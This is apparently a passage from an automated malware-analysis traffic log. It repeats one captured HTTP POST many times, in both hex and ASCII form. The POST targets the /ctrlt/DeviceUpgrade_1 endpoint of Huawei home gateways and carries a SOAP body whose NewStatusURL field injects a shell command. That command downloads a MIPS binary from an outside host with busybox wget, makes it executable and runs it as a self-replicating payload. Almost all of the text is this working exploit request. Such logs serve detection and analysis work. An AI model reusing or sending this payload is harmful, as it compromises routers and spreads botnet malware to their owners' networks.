74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 